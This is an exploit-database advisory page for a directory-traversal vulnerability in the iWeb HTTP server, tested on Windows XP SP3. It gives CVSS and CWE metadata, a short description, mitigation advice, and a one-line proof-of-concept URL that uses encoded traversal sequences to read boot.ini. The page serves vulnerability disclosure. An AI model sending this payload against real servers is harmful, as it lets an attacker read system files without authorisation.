header-logo
Suggest Exploit
vendor:
iWeb
by:
mr_me
7.5
CVSS
HIGH
Directory Transversal
22
CWE
Product Name: iWeb
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:ashley_brown:iweb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

iWeb HTTP server Directory Transversal Vulnerability

This vulnerability allows an attacker to access files outside of the web root directory by using directory transversal techniques. An attacker can use this vulnerability to access sensitive files such as boot.ini, which can be used to gain further access to the system.

Mitigation:

Ensure that web applications are not vulnerable to directory transversal attacks by validating user input and restricting access to sensitive files.
Source

Exploit-DB raw data:

#################################################################
#
# iWeb HTTP server Directory Transversal Vulnerability
# Found By: mr_me
# Download: http://www.ashleybrown.co.uk/iweb/
# Tested On: Windows XPSP3
#
#################################################################

POC:

http://server/..%5C..%5C..%5Cboot.ini

Navigation

Suggest Exploit

Services By CQR